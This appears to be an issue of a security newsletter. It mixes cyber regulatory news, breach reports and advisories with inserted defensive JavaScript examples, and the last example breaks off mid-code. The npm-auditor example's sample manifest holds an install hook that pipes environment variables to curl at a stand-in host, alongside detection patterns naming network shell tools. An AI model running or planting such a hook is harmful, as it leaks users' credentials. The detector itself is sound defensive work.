Robert Grupe's AppSecNewsBits 2025-01-18
New Year Starts with a Bang: Cyber Security Legal & Regulatory Guidance
LEGAL & REGULATORY
Secure software development practices are not sufficient to address the potential for cyber incidents from resourced and determined nation-state actors. To mitigate the risk of such incidents occurring, software providers must also address how software is delivered and the security of the software itself.
Key provisions include:
Software Supply Chain Security: This initiative requires software providers to submit machine-readable attestations of secure development practices, which must be validated by the Cybersecurity and Infrastructure Security Agency within 90 days.
Federal Cybersecurity Enhancements: Introduces stronger endpoint detection and response (EDR) tools, phishing-resistant authentication methods, and updated cloud security protocols, with implementation deadlines set for 120 days.
Quantum-Resistant Cryptography: Sets a goal for federal agencies to transition to post-quantum cryptographic standards by 2030, with “detailed plans” to be submitted within 90 days.
AI for Cyber Defense: Launches initiatives to use artificial intelligence to bolster cybersecurity, particularly in critical infrastructure sectors like energy, with pilot programs required to begin within 180 days.
Cybersecurity in Space: Requires enhanced protections for space systems and ground stations to address evolving threats, with agency reviews and updates to cybersecurity requirements due within 180 days.
Open Source Software Management: Encourages agencies to adopt best practices for using and securing open source software, with recommendations to be issued within 120 days.
New Requirements for Vendors: Mandates minimum cybersecurity practices for federal contractors and establishes a “Cyber Trust Mark” for consumer Internet-of-Things devices, with implementation required within 240 days.

Upon closer examination, this executive order appears to set a series of strategic traps in the form of numerous deadlines that will constrain the incoming administration, particularly the Department of Government Efficiency, also widely known as DOGE, led by Vivek Ramaswamy and Elon Musk. These compressed timelines seem designed to overwhelm federal agencies, potentially paving the way for partisan blame games if implementation falls short. This appears to be an attempt to undermine DOGE’s efforts under the pretext of cybersecurity reform.
The order, issued on January 16, states that “improving accountability for software and cloud service providers, strengthening the security of federal communications and identity management systems, and promoting innovative developments and the use of emerging technologies for cybersecurity across executive departments and agencies (agencies) and with the private sector are especially critical to improvement of the nation’s cybersecurity.”
The order features nine sections mandating 52 agency actions across the federal government over the next several years, from bolstering software security supply chains to combatting cybercrime and fraud through digital identity documents to launching pilot programs to improve cybersecurity through artificial intelligence.
To combat the rapidly rising tide of identity-based cyber threats, the EO strongly encourages “the use of digital identity documents to access public benefits programs that require identity verification, so long as it is done in a manner that supports the principles of privacy, accessibility, data minimization, and interoperability.” The order stresses that the federal government must adopt more rigorous third-party risk management practices and greater assurance that software providers support critical government services. It stipulates, among other things, that the Federal Acquisition Regulatory Council (FAR Council) must require software providers to submit software development attestations of sufficient secure software development practices.
The order requires federal agencies to begin using, as appropriate, commercial phishing-resistant standards such as WebAuthn in pilot deployments or larger deployments to prioritize phishing-resistant authentication options. The EO requires federal agencies to protect against adversarial nations and criminals by ensuring that routing information originated and propagated across the internet using the border gateway protocol (BGP) is protected against attack and misconfiguration.
The EO states that the federal government must “accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.” The chief factor determining how much of the EO is accepted or rejected by the Trump administration is who will ultimately be named to fulfill the top cybersecurity policy positions at the White House, at the Cybersecurity and Infrastructure Security Agency (CISA), and elsewhere in the federal government.
The EU’s Digital Operational Resilience Act (DORA) is here. The new legislation officially entered into force on January 17, 2025, and organizations falling under DORA’s scope can now face substantial penalties for non-compliance.
The provisions apply to banks, insurance and investment companies. Third-party IT providers within the financial industry are also in scope. As well as a focus on resilience, the law also seeks to address rising supply chain and third-party risks.
Non-compliant organizations can incur fines up to 2% of their global annual turnover or €10m ($10.2m), whichever is higher.
Third-party organizations may also face fines of up to 1% of their average daily global turnover for each day of non-compliance, for up to six months.
Additionally, regulatory authorities have the power to limit or suspend non-compliant financial firms’ business activities until they achieve full compliance.
Notably, DORA includes individual liability for business leaders for their firm’s compliance failures; such individuals can receive a maximum penalty of €1m ($1.02m).
“Firms have had years to prepare, and the various supervisory authorities responsible for the implementation have been proactive in providing education and resources to ensure all participants understand the requirements.”
Despite the positive signs, there are aspects of DORA that are causing compliance concerns. A report by Orange Cyberdefense found that 43% of the UK financial services industry will miss the DORA compliance deadline and will not be compliant for at least three months.
Compliance delays appear to be primarily related to the provisions around ICT third-party risk management.
The attack on the U.S. Treasury was disclosed to the public in late December 2024.
The breach was possible after the hackers exploited a zero-day vulnerability in the remote support platform BeyondTrust.
The Treasury announced that the operation was conducted by “Silk Typhoon” (a.k.a. Hafnium), a team of skilled cyberspies who target a broad range of organizations in the U.S., Japan, Australia, and Vietnam.
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Yin Kecheng, a Shanghai-based hacker for his role in the recent Treasury breach and a company associated with the Salt Typhoon threat group. “Yin Kecheng has been a cyber actor for over a decade and is affiliated with the People’s Republic of China Ministry of State Security (MSS). Yin Kecheng was associated with the recent compromise of the Department of the Treasury’s Departmental Offices network.”
The sanctions imposed on Yin and the Chinese cybersecurity firm under Executive Order (E.O.) 13694 block all property and financial assets that are located in the United States or are in the possession of U.S. entities, including banks, businesses, and individuals. Additionally, U.S. entities are prohibited from conducting any transactions with the sanctioned entities without OFAC's explicit authorization.
U.S. Treasury's announcement reiterates that the U.S. Department of State offers, through its Rewards for Justice program, up to $10,000,000 for information leading to uncovering the identity of hackers who have targeted the U.S. government or critical infrastructure in the country.
The White House unveiled what it calls the Final Rule on Artificial Intelligence Diffusion from the Biden-Harris government, placing limits on the number of AI-focused chips that can be exported to most countries, but allowing exemptions for key allies and partners.
However GPU supremo Nvidia claims the proposed rules are so harmful that it has published a document strongly criticizing the decision. "This sweeping overreach would impose bureaucratic control over how America's leading semiconductors, computers, systems and even software are designed and marketed globally. And by attempting to rig market outcomes and stifle competition – the lifeblood of innovation – the Biden administration's new rule threatens to squander America's hard-won technological advantage."
Nvidia shares were down by 4 percent in response to the news, according to MarketWatch, which published an alarming claim that 80 percent of the market for GPUs may evaporate if the policy is enacted.
The United Nations Security Council held a meeting to discuss the dangers of commercial spyware, which marks the first time this type of software — also known as government or mercenary spyware — has been discussed at the Security Council.
While the meeting was mostly informal and didn’t end with any concrete proposals, most of the countries involved, including France, South Korea, and the United Kingdom, agreed that governments should take action to control the proliferation and abuse of commercial spyware. Russia and China, on the other hand, dismissed the concerns.
Russia pointed blame at the United States. The Russian representative, referring to historical revelations of NSA spying by U.S. whistleblower Edward Snowden, said that, “it was the United States specifically who created a veritable system for global surveillance and illegal interference in the private life of their own citizens, and citizens of other countries, and continue perfecting this system.”
China’s representative criticized the meeting itself, saying that discussing “the so-called commercial spyware and the maintenance of international peace and security is putting the cart before the horse when compared to the more harmful proliferation activities by governments. Since the Stuxnet incident, the proliferation of advanced national cyber weapons have created a series of major internet risks, which are far more harmful than commercial spyware.”
Texas has sued one of the nation’s largest car insurance providers alleging that it violated the state’s privacy laws by surreptitiously collecting detailed location data on millions of drivers and using that information to justify raising insurance premiums.
In 2015, Allstate developed the Arity Driving Engine software development kit (SDK), a package of code that the company allegedly paid mobile app developers to install in their products in order to collect a variety of sensitive data from consumers’ phones. The SDK gathered phone geolocation data, accelerometer, and gyroscopic data, details about where phone owners started and ended their trips, and information about “driving behavior,” such as whether phone owners appeared to be speeding or driving while distracted.
Neither Allstate, Arity, nor the app developers properly informed customers in their privacy policies about what data the SDK was collecting or how it would be used.
“The personal data of millions of Americans was sold to insurance companies without their knowledge or consent in violation of the law. Texans deserve better and we will hold all these companies accountable.” In its complaint, filed in federal court, Texas requested that Allstate be ordered to pay a penalty of $7,500 per violation of the state’s data privacy law and $10,000 per violation of the state’s insurance code, which would likely amount to millions of dollars given the number of consumers allegedly affected.
The lawsuit also asks the court to make Allstate delete all the data it obtained through actions that allegedly violated the privacy law and to make full restitution to customers harmed by the companies’ actions.
The New York attorney general's investigation into Enzo Biochem's security practices found various failings that led to 2.47 million people's data being compromised.
Genuine company credentials were used to make the initial intrusion, and these credentials were shared among five employees.
One of the credentials hadn't been updated in ten years.
Enzo also didn't require multi-factor authentication (MFA), its processes for encrypting data at rest were deemed ineffective, and it was found to have taken an "informal" approach to evaluating IT risk, among other findings.
"Getting blood work or medical testing should not result in patients having their personal and health information stolen by cybercriminals. Healthcare companies like Enzo that do not prioritize data security put patients at serious risk of fraud and identity theft. Data security is part of patient safety."
The ICO warned that it will intervene if Google cannot demonstrate existing legal requirements for such tech, including options to secure freely-given consent, ensure fair processing, and uphold the right to erasure:
"Businesses should not consider fingerprinting a simple solution to the loss of third-party cookies and other cross-site tracking signals."
The company's updated platform program policies include relaxed restrictions on advertisers and personalized ad targeting across a range of devices, an outcome of a larger "advertising ecosystem shift" and the advancement of privacy-enhancing technologies (PETs) like on-device processing and trusted execution environments, in the words of the company.
A departure from its longstanding pledge to user choice and privacy, Google argues these technologies offer enough protection for users while also creating “new ways for brands to manage and activate their data safely and securely."
The new feature will be available to advertisers beginning Feb. 16, 2025.
Unlike other data collection tools such as cookies, digital fingerprinting is difficult to spot, and thus harder for even privacy-conscious users to erase or block.
On Dec. 19, the UK's Information Commissioner’s Office (ICO) — a data protection and privacy regulator — labeled Google "irresponsible" for the policy change, saying the shift to fingerprinting is an unfair means of tracking users, reducing choice and control over their personal information. The watchdog also warned that the move could encourage riskier advertiser behavior.
Hackers have compromised location aggregator Gravy Analytics, stealing “customer lists, information on the broader industry, and even location data harvested from smartphones which show peoples’ precise movements.” This has dumped a trove of sensitive data into the public domain.
This particular leak has spawned various lists of apps, allegedly “hijacked to spy on your location.” These include dating sites Tinder and Grindr; massive games such as Candy Crush, Temple Run, Subway Surfers, and Harry Potter: Puzzles & Spells; transit app Moovit; My Period Calendar & Tracker, a period-tracking app with more than 10 million downloads; popular fitness app MyFitnessPal; social network Tumblr; Yahoo’s email client; Microsoft’s 365 office app; and flight tracker Flightradar24.... religious-focused apps such as Muslim prayer and Christian Bible apps, various pregnancy trackers, and many VPN apps, which some users may download, ironically, in an attempt to protect their privacy.
In the United States, the federal government has long urged against paying ransom demands but has stopped short of imposing an outright national ban on ransom payments.
However, in October 2023, a U.S.-led alliance of more than 40 countries vowed not to pay ransoms to cybercriminals in a bid to starve the hackers of their source of income.
The potential benefits of using NHS data to train AI models are indeed significant, with promising prospects for research advancements, improved patient outcomes, and cost savings.
However, we must not overlook the substantial data privacy, confidentiality and security challenges that accompany this initiative.
Non-profit privacy advocacy group "None of Your Business" (noyb) has filed six complaints against TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi for unlawfully transferring European users' data to China in breach of the European Union's General Data Protection Regulation (GDPR). noyb filed the complaints with data protection authorities (DPAs) in Greece, Italy, Belgium, the Netherlands, and Austria on behalf of users in those countries.
The Supreme Court in its ruling held that the risk to national security posed by TikTok’s ties to China overcomes concerns about limiting speech by the app or its 170 million users in the United States.
The decision came against the backdrop of unusual political agitation by President-elect Donald Trump, who vowed that he could negotiate a solution, and the administration of President Joe Biden, which has signaled it won’t enforce the law — which was passed with overwhelming bipartisan support — beginning Sunday, his final full day in office.
[rG: However Google (and Apple) will probably block TikTok in retaliation for YouTube lost revenue, and ISPs will block due to uncertainty about potential enforcement.]
The Biden administration finalized a new rule that would effectively ban all Chinese vehicles from the US under the auspices of blocking the “sale or import” of connected vehicle software from “countries of concern.”
The rule could have wide-ranging effects on big automakers, like Ford and GM, as well as smaller manufacturers like Polestar — and even companies that don’t produce cars, like Waymo. The rule covers everything that connects a vehicle to the outside world, such as Bluetooth, Wi-Fi, cellular, and satellite components. It also addresses concerns that technology like cameras, sensors, and onboard computers could be exploited by foreign adversaries to collect sensitive data about US citizens and infrastructure. And it would ban China from testing its self-driving cars on US soil.
The Alliance for Automotive Innovation, which represents GM, Ford, Volkswagen, Toyota, and others, said in comments submitted last April that it supports the goal of the proposed rules but warned that the global automotive supply chain “is one of the world’s largest and most complex” and that parts could not be simply swapped out without disruptions.
The White House states in its fact sheet that the rule prevents the import or sale of connected vehicles “by entities who are owned by, controlled by, or subject to the jurisdiction or direction of the PRC or Russia – even if those vehicles were made in the United States.”
EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
UnitedHealth hid its Change Healthcare data breach notice for months
Change Healthcare, the UnitedHealth-owned health tech company that lost more than 100 million people’s sensitive health data in a ransomware attack last year, said that the company has “substantially” completed notifying affected individuals about the massive data breach.
The February 2024 ransomware attack on Change Healthcare, one of the biggest processors of patient billing in the United States, resulted in months-long outages that disrupted care across the U.S. healthcare system. The data breach also became the largest known theft of medical data in U.S. history. Change Healthcare paid the hackers a ransom with the aim of preventing them from publishing any more of the stolen data, and in exchange, obtained a copy of the stolen data to begin notifying people whose information was taken.
TechCrunch’s review of the breach notice’s web page source code reveals Change Healthcare included hidden “noindex” code on the notice, which tells search engines to ignore the web page, making it more difficult for anyone searching the web for the notice to find it in search results. Change Healthcare had been including the “noindex” code on its data breach notice since at least November 20, 2024. Change Healthcare has been criticized for being slow to notify affected individuals of the breach — the company only started to do so four months after it had received a copy of the stolen files.
The delay in public disclosure prompted several U.S. states, including California, Massachusetts, Nebraska and New Hampshire, to intervene by notifying residents to stay alert to identity theft and fraud following the data breach. In December 2024, Nebraska brought legal action against Change Healthcare for a string of security failings that led to the breach.
The package grabs the output of the env command, which includes many configuration values for your system.
Often things like AWS keys, NPM tokens, GitHub credentials and other sensitive variables are exposed by the env command, so guess what? The threat actor now has all those credentials too!
Luckily, the OpenSSF package analysis scanner identified these packages as malicious. OSV generated 3 malware advisories: MAL-2025-27, MAL-2025-28 and MAL-2025-29.
The user who published the NPM package uses a snyk[.]io email address for the Snyk Security Labs team. This part of the metadata cannot be faked. The author field in the metadata specifically mentions an employee at Snyk. This part of the NPM package metadata can be faked, but since the publisher is a verified Snyk email, my guess is that this genuinely came from Snyk.
I’ve alerted NPM but these packages haven’t been marked as malicious yet, so no security tool could protect you from these malicious packages. Unfortunately, that’s how most software supply chain security tools work: you have to know that a package is malicious before the tool can protect you. But in general, it’s a good idea not to install NPM packages blindly.
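Since no feed had flagged the packages yet, the only thing that would have caught this at install time is a local check on what each package's install-time scripts actually do. The following is an added example, not code from the post, from Snyk or from OpenSSF: it audits the lifecycle scripts declared in a set of package.json manifests (constructed inline here; in practice you would read them from node_modules/*/package.json, or from the tarballs fetched with npm pack before installing) and flags scripts that both read the environment and reach the network, the combination that turns env output into a credential leak. Package names and script contents below are invented for the illustration.

```javascript
// Added example (not from the original post): flag npm lifecycle scripts that
// can exfiltrate environment variables. Pure functions, no I/O, runs offline.

// npm runs these hooks automatically on `npm install` unless ignore-scripts is set.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// An install script has no business dumping the whole environment...
const ENV_READERS = [/\benv\b/, /\bprintenv\b/, /process\.env\b/, /os\.environ\b/];
// ...or sending bytes somewhere.
const NETWORK_CALLS = [
  /\bcurl\b/, /\bwget\b/, /\bfetch\(/, /\bhttps?\.request\(/, /\baxios\b/,
  /\bnc\b/, /\/dev\/tcp\//, /\bInvoke-WebRequest\b/, /\biwr\b/,
];
// Scripts that merely delegate to a file hide the payload one hop away.
const DELEGATES = /\b(node|sh|bash|python3?|powershell)\s+([^\s&|;]+)/;

function matchesAny(text, patterns) {
  return patterns.some((re) => re.test(text));
}

// Audit one manifest; returns a list of findings (empty when nothing stands out).
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const readsEnv = matchesAny(cmd, ENV_READERS);
    const talksNet = matchesAny(cmd, NETWORK_CALLS);
    const delegate = DELEGATES.exec(cmd);
    if (readsEnv && talksNet) {
      findings.push({ pkg: manifest.name, hook, severity: "high",
        reason: "install hook reads the environment and makes a network call" });
    } else if (talksNet) {
      findings.push({ pkg: manifest.name, hook, severity: "medium",
        reason: "install hook makes a network call" });
    } else if (delegate) {
      findings.push({ pkg: manifest.name, hook, severity: "info",
        reason: `install hook runs ${delegate[2]}; inspect that file before trusting it` });
    }
  }
  return findings;
}

// Audit many manifests, worst first.
function auditAll(manifests) {
  const order = { high: 0, medium: 1, info: 2 };
  return manifests.flatMap(auditManifest)
    .sort((a, b) => order[a.severity] - order[b.severity]);
}

// Constructed sample manifests (invented names, not real packages).
const SAMPLE_MANIFESTS = [
  { name: "left-pad-ish", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "totally-benign-utils", version: "0.3.1",
    scripts: { postinstall: "env | curl -s -X POST --data-binary @- https://example.invalid/collect" } },
  { name: "native-thing", version: "2.0.0", scripts: { install: "node-gyp rebuild" } },
  { name: "setup-helper", version: "1.1.0", scripts: { preinstall: "node setup.js" } },
];

function demo() {
  return auditAll(SAMPLE_MANIFESTS);
}
```

The patterns only catch blatant cases; an obfuscated payload, or one that lives in the delegated file, still needs that file read. The cheap defence that needs no scanner is ignore-scripts=true in .npmrc, so install hooks never run in CI and on developer machines unless a package has been reviewed and explicitly rebuilt.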
PowerSchool, whose school records software is used to support more than 60 million students across the United States, was hit by an intrusion in December that compromised the company’s customer support portal with stolen credentials, allowing access to reams of personal data belonging to students and teachers in K-12 schools.
PowerSchool hasn’t said how many of its school customers are affected.
Startup necromancy: Dead Google Apps domains can be compromised by new owners
Given the number of people working for tech startups (6 million), the failure rate of said startups (90 percent), their usage of Google Workspaces (50 percent), and the speed at which startups tend to fall apart, there are a lot of Google-auth-connected domains up for sale at any time.
That would not be an inherent problem, except that buying a domain with a still-active Google account can let you re-activate the Google accounts for former employees. With admin access to those accounts, you can get into many of the services they used Google's OAuth to log into, like Slack, ChatGPT, Zoom, and HR systems.
Ayrey bought a defunct startup domain and got access to each of those through Google account sign-ins, and ended up with tax documents, job interview details, and direct messages, among other sensitive materials.
Google's instructions note that canceling a Google Workspace "doesn't remove user accounts." Any domain that used Google Workspace accounts to authenticate with third-party services and failed to delete their Google account to remove its domain link before selling the domain could be vulnerable.
Ayrey's proposed fix, which he suggested to Google, is to include two new immutable identifiers inside its OpenID Connect claims: one tied to the user that never changes and one tied to the domain.
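The takeover works because the relying party treats the e-mail address (and the hd domain) as the identity, so an account freshly created by the domain's new owner looks like the old employee. The following is an added example, not code from Ayrey's write-up or from any of the services named above: it shows how a relying party would link Google sign-ins to its own user records by the iss and sub claims (the stable identifiers the OIDC spec already defines; the immutable user and domain identifiers Ayrey proposed would play the same role) and refuse to silently attach a sign-in whose e-mail matches an existing record but whose sub does not. The user store and ID-token claims are constructed for the illustration, and the ID token's signature is assumed to have been verified already.

```javascript
// Added example: account resolution for an OIDC relying party that must not
// let an account re-created on a resold domain inherit an old user's access.
// Claims are assumed to come from an already signature-verified ID token.

const GOOGLE_ISS = "https://accounts.google.com"; // Google also issues "accounts.google.com"

// Resolve verified ID-token claims against the app's user records.
// Returns { action: "login", user } | { action: "create" } | { action: "reject", reason }.
function resolveAccount(users, claims, opts = {}) {
  const allowedHd = opts.allowedHd; // workspace domain this tenant was provisioned for
  if (claims.iss !== GOOGLE_ISS) return { action: "reject", reason: "unexpected issuer" };
  if (claims.email_verified !== true || !claims.email) {
    return { action: "reject", reason: "email not verified by IdP" };
  }
  if (allowedHd && claims.hd !== allowedHd) return { action: "reject", reason: "hosted domain mismatch" };

  // 1. Primary key is (iss, sub). Whoever buys the domain gets new sub values.
  const bySub = users.find((u) => u.iss === claims.iss && u.sub === claims.sub);
  if (bySub) {
    if (bySub.disabled) return { action: "reject", reason: "account disabled" };
    return { action: "login", user: bySub };
  }

  // 2. Same e-mail, different subject: never auto-link. This is exactly the
  //    "necromancy" case; route it to an admin instead of granting the old access.
  const byEmail = users.find((u) => u.email.toLowerCase() === claims.email.toLowerCase());
  if (byEmail) {
    return { action: "reject",
      reason: `email ${claims.email} already belongs to subject ${byEmail.sub}; manual re-verification required` };
  }

  // 3. Genuinely new user.
  return { action: "create" };
}

// Constructed user records for a hypothetical startup on example.invalid.
const USERS = [
  { id: 1, iss: GOOGLE_ISS, sub: "104857602020", email: "alice@example.invalid", disabled: false },
  { id: 2, iss: GOOGLE_ISS, sub: "104857602021", email: "bob@example.invalid", disabled: true },
];

// Constructed claims: the original Alice, then an "Alice" re-created by whoever
// bought example.invalid and stood Workspace back up on it.
const ORIGINAL_ALICE = { iss: GOOGLE_ISS, sub: "104857602020", email: "alice@example.invalid",
  email_verified: true, hd: "example.invalid" };
const RESURRECTED_ALICE = { iss: GOOGLE_ISS, sub: "118000000999", email: "alice@example.invalid",
  email_verified: true, hd: "example.invalid" };

function demo() {
  const opts = { allowedHd: "example.invalid" };
  return {
    original: resolveAccount(USERS, ORIGINAL_ALICE, opts).action,
    resurrected: resolveAccount(USERS, RESURRECTED_ALICE, opts).action,
  };
}
```

Two caveats. If an identity provider ever re-issues the same sub to a re-created account, this check cannot tell the two apart, which is why the write-up asks for identifiers that are immutable by contract. And the disabled flag matters as much as the key: departed employees must be disabled in your own user store, not only at the IdP, because the IdP side is exactly what a new domain owner controls.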
FBI Warned Agents It Believes Phone Logs Hacked Last Year
FBI leaders have warned that they believe hackers who broke into AT&T Inc.’s system last year stole months of their agents’ call and text logs, setting off a race within the bureau to protect the identities of confidential informants. FBI officials told agents across the country that details about their use on the telecom carrier’s network were believed to be among the billions of records stolen, according to the document and interviews with a current and a former law enforcement official. They asked not to be named to discuss sensitive information.

Data from all FBI devices under the bureau’s AT&T service for public safety agencies were presumed taken. The cache of hacked AT&T records didn’t reveal the substance of communications but, according to the document, could link investigators to their secret sources. The data was believed to include agents’ mobile phone numbers and the numbers with which they called and texted.

AT&T publicly disclosed the breach in July and said it included six months worth of mobile phone customer data from 2022. The hackers threatened to sell the data unless the telecommunications company paid an extortion fee.
Russia's largest platform for state procurement hit by cyberattack from pro-Ukraine group
The previously unknown pro-Ukraine hacker group Yellow Drift claimed responsibility for the attack on Roseltorg, stating they had deleted 550 terabytes of data, including emails and backups. As proof, the hackers published screenshots from the platform’s allegedly compromised infrastructure.
How OpenAI’s bot crushed this seven-person company’s website ‘like a DDoS attack’
Triplegangers CEO Oleksandr Tomchuk was alerted that his company’s e-commerce site was down. It looked to be some kind of distributed denial-of-service attack. He soon discovered the culprit was a bot from OpenAI that was relentlessly attempting to scrape his entire, enormous site. “We have over 65,000 products, each product has a page. Each page has at least three photos.” OpenAI was sending “tens of thousands” of server requests trying to download all of it, hundreds of thousands of photos, along with their detailed descriptions. “OpenAI used 600 IPs to scrape data, and we are still analyzing logs from last week."
Triplegangers has a terms of service page on its site that forbids bots from taking its images without permission. But that alone did nothing. Websites must use a properly configured robots.txt file with tags specifically telling OpenAI’s bot, GPTBot, to leave the site alone. (OpenAI also has a couple of other bots, ChatGPT-User and OAI-SearchBot, that have their own tags, according to its information page on its crawlers.)
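Because robots.txt is the only control OpenAI says its crawlers honour, it is worth being able to check what a given file actually tells a given bot before relying on it. The following is an added example, not code from the article or from OpenAI: a small robots.txt evaluator following the RFC 9309 rules (the user-agent group whose token is the longest match wins; within a group the longest matching Allow/Disallow path wins, Allow winning ties; * and $ wildcards in paths). The sample robots.txt is constructed, not Triplegangers' real file; the three OpenAI user-agent tokens are the ones named in the article.

```javascript
// Added example: evaluate robots.txt for a crawler's product token.

// Parse robots.txt into groups: [{ agents: [...], rules: [{ allow, path }] }].
function parseRobots(text) {
  const groups = [];
  let current = null;
  let lastWasAgent = false;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*/, "").trim();   // strip comments
    if (!line) continue;
    const m = /^([A-Za-z-]+)\s*:\s*(.*)$/.exec(line);
    if (!m) continue;
    const field = m[1].toLowerCase();
    const value = m[2].trim();
    if (field === "user-agent") {
      // Consecutive User-agent lines share one group.
      if (!current || !lastWasAgent) { current = { agents: [], rules: [] }; groups.push(current); }
      current.agents.push(value.toLowerCase());
      lastWasAgent = true;
    } else if ((field === "allow" || field === "disallow") && current) {
      current.rules.push({ allow: field === "allow", path: value });
      lastWasAgent = false;
    } else {
      lastWasAgent = false; // Sitemap, Crawl-delay etc. do not start a group
    }
  }
  return groups;
}

// The group whose agent token is the longest substring match of the product
// token applies; "*" applies only when nothing more specific matches.
function selectGroup(groups, userAgent) {
  const ua = userAgent.toLowerCase();
  let best = null, bestLen = -1;
  for (const g of groups) {
    for (const a of g.agents) {
      if (a === "*") { if (bestLen < 0) { best = g; bestLen = 0; } }
      else if (ua.includes(a) && a.length > bestLen) { best = g; bestLen = a.length; }
    }
  }
  return best;
}

// Robots path pattern to regex: "*" matches any run, a trailing "$" anchors the end.
function patternToRegex(path) {
  let re = path.replace(/[.+?^${}()|[\]\\]/g, "\\$&").replace(/\*/g, ".*");
  if (re.endsWith("\\$")) re = re.slice(0, -2) + "$";
  return new RegExp("^" + re);
}

// Is this URL path allowed for this user agent?
function isAllowed(groups, userAgent, urlPath) {
  const g = selectGroup(groups, userAgent);
  if (!g) return true;                    // no applicable group: everything is allowed
  let best = null;
  for (const r of g.rules) {
    if (r.path === "") continue;          // "Disallow:" with no value disallows nothing
    if (!patternToRegex(r.path).test(urlPath)) continue;
    if (!best || r.path.length > best.path.length ||
        (r.path.length === best.path.length && r.allow && !best.allow)) best = r;
  }
  return best ? best.allow : true;
}

// Constructed sample: shut out the three OpenAI crawlers, fence /admin/ for everyone else.
const SAMPLE_ROBOTS = `
# constructed example, not a real site's file
User-agent: GPTBot
User-agent: ChatGPT-User
User-agent: OAI-SearchBot
Disallow: /

User-agent: *
Disallow: /admin/
Allow: /admin/public/
`;

function demo() {
  const groups = parseRobots(SAMPLE_ROBOTS);
  return {
    gptbotProduct: isAllowed(groups, "Mozilla/5.0 (compatible; GPTBot/1.0)", "/products/123"),
    oaiSearchRoot: isAllowed(groups, "OAI-SearchBot/1.0", "/"),
    googlebotAdmin: isAllowed(groups, "Googlebot/2.1", "/admin/private.html"),
    googlebotPublic: isAllowed(groups, "Googlebot/2.1", "/admin/public/index.html"),
    googlebotProduct: isAllowed(groups, "Googlebot/2.1", "/products/123"),
  };
}
```

Run the evaluator against your own file with the product tokens you care about before assuming they are excluded; a Disallow added after a crawl has started does nothing for the requests already in flight, and a crawler that ignores the file altogether needs an edge control (user-agent or per-source rate limiting) rather than a text file.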
Not only was Triplegangers knocked offline by OpenAI’s bot during U.S. business hours, but Tomchuk expects a jacked-up AWS bill thanks to all of the CPU and downloading activity from the bot.
Aviatrix Controllers OS Command Injection Vulnerability: Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Fortinet FortiOS Authorization Bypass Vulnerability: Fortinet FortiOS contains an authorization bypass vulnerability that may allow an unauthenticated remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Microsoft Windows Hyper-V NT Kernel Integration VSP Heap-based Buffer Overflow Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a heap-based buffer overflow vulnerability that allows a local attacker to gain SYSTEM privileges
Microsoft Windows Hyper-V NT Kernel Integration VSP Use-After-Free Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a use-after-free vulnerability that allows a local attacker to gain SYSTEM privileges.
Microsoft Windows Hyper-V NT Kernel Integration VSP Use-After-Free Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a use-after-free vulnerability that allows a local attacker to gain SYSTEM privileges.
BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) OS Command Injection Vulnerability: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) contain an OS command injection vulnerability that can be exploited by an attacker with existing administrative privileges to upload a malicious file. Successful exploitation of this vulnerability can allow a remote attacker to execute underlying operating system commands within the context of the site user.
Qlik Sense HTTP Tunneling Vulnerability: Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
HACKING
Scammers file first — Get your IRS Identity Protection PIN now
The IRS relaunched its Identity Protection Personal Identification Number (IP PIN) program this week and all US taxpayers are encouraged to enroll for added security against identity theft and fraudulent returns.
An Identity Protection PIN (IP PIN) is a six-digit number assigned to a taxpayer that must be used when filing a tax return. This number is only valid for the current year, with a new one assigned each tax year.
The IRS advises taxpayers to enroll as early as they can in a calendar year, as cybercriminals commonly attempt to send their tax returns in before taxpayers submit their own.
Ransomware crew abuses AWS native encryption, sets data-destruct timer for 7 days
A new ransomware crew dubbed Codefinger targets AWS S3 buckets and uses the cloud giant's own server-side encryption with customer provided keys (SSE-C) to lock up victims' data before demanding a ransom payment for the symmetric AES-256 keys required to decrypt it.
Because AWS processes the key during encryption but does not store it, the victim cannot decrypt their data without the attacker-generated key. Historically, leaked AWS IAM keys have been used for data theft, but if this approach gains widespread adoption, it could represent a significant systemic risk to organizations relying on AWS S3 for the storage of critical data. Codefinger breaks into victim orgs' cloud storage buckets using publicly exposed or compromised AWS keys with read and write permissions to execute "s3:GetObject" and "s3:PutObject" requests.
AWS customers should restrict the use of SSE-C. This can be achieved by leveraging the Condition element in IAM policies to prevent unauthorized applications of SSE-C on S3 buckets, ensuring that only approved data and users can utilize this feature.
Plus, it's important to monitor and regularly audit AWS keys, as these make very attractive targets for all types of criminals looking to break into companies' cloud environments and steal data.
Permissions should be reviewed frequently to confirm they align with the principle of least privilege, while unused keys should be disabled, and active ones rotated regularly to minimize exposure.
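The Condition-based restriction described above, as an added example that is not from the article or from AWS: the bucket-policy statement that denies any PutObject carrying a customer-provided-key header (CopyObject needs the same permission on the destination, so it is covered too), a minimal evaluator showing the Null condition doing its job against two constructed requests, and a detector for SSE-C writes in CloudTrail S3 data events. The bucket name, the request headers and the CloudTrail records are constructed; the field additionalEventData.SSEApplied is the one S3 data events carry for the encryption mode, but treat the exact value as an assumption to confirm against your own trail before alerting on it.

```javascript
// Added example: deny SSE-C writes in a bucket policy and spot them in CloudTrail.

const BUCKET = "example-critical-data";   // hypothetical bucket name
const SSEC_KEY = "s3:x-amz-server-side-encryption-customer-algorithm";

// Bucket policy: deny any PutObject that supplies a customer-provided key.
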